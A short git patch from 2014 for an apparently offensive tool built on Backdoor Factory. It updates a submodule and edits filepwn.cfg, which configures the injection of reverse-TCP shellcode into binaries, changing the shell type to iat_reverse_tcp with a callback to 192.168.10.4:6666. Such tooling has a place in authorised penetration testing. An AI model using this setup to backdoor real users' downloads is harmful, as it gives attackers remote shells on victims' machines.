From 58b319a931b84d30c2d30175aebc7ea5a3e28f6b Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 18 Jul 2014 17:59:58 +0200 Subject: [PATCH] updated filepwn.cfg file with new payload --- bdfactory | 2 +- filepwn.cfg | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/bdfactory b/bdfactory index 63ae286..c09cdf2 160000 --- a/bdfactory +++ b/bdfactory @@ -1 +1 @@ -Subproject commit 63ae286b541eb779fe3b47f9ca49e27347d7c0eb +Subproject commit c09cdf2b7c36fc47d081b611542344f8b794a09c diff --git a/filepwn.cfg b/filepwn.cfg index 0518470..d5a9f97 100644 --- a/filepwn.cfg +++ b/filepwn.cfg @@ -39,7 +39,7 @@ blacklist = .dll, #don't do dlls in a zip file PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND HOST = 192.168.10.4 PORT = 6666 - SHELL = loadliba_reverse_tcp + SHELL = iat_reverse_tcp SUPPLIED_SHELLCODE = None ZERO_CERT = False PATCH_DLL = True